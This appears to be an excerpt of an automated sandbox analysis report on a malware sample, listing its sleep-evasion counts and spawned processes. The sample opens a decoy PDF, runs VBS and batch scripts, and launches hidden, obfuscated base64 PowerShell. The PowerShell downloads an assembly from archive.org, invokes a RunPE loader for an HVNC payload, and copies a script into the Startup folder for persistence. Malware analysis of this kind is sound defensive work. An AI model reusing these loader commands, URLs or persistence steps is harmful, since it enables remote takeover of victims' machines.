Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984 |
Thread sleep count: 835 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996 |
Thread sleep count: 5050 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1972 |
Thread sleep count: 4713 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692 |
Thread sleep count: 34 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692 |
Thread sleep time: -31359464925306218s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2544 |
Thread sleep count: 2143 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3252 |
Thread sleep count: 694 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6212 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 64 |
Thread sleep count: 39 > 30 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 64 |
Thread sleep time: -35971150943733603s >= -30000s |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3784 |
Thread sleep count: 4912 > 30 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3784 |
Thread sleep count: 4880 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824 |
Thread sleep count: 824 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 980 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4456 |
Thread sleep count: 9141 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796 |
Thread sleep count: 619 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4256 |
Thread sleep count: 31 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4256 |
Thread sleep time: -28592453314249787s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8620 |
Thread sleep count: 700 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6772 |
Thread sleep count: 112 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460 |
Thread sleep count: 9355 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8508 |
Thread sleep time: -26747778906878833s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808 |
Thread sleep count: 401 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1084 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 8396 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396 |
Thread sleep count: 488 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8428 |
Thread sleep count: 515 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6084 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5928 |
Thread sleep count: 9437 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352 |
Thread sleep time: -23058430092136925s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676 |
Thread sleep count: 235 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 |
Thread sleep count: 9349 > 30 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9132 |
Thread sleep time: -23058430092136925s >= -30000s |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 |
Thread sleep count: 255 > 30 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4064 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5352 |
Thread sleep time: -922337203685477s >= -30000s |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\privacy_policy.pdf |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat"" |
Jump to behavior |
Source: C:\Users\user\Desktop\TM3utH2CsU.exe |
Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username% |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\privacy_policy.pdf" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\wscript.exe |
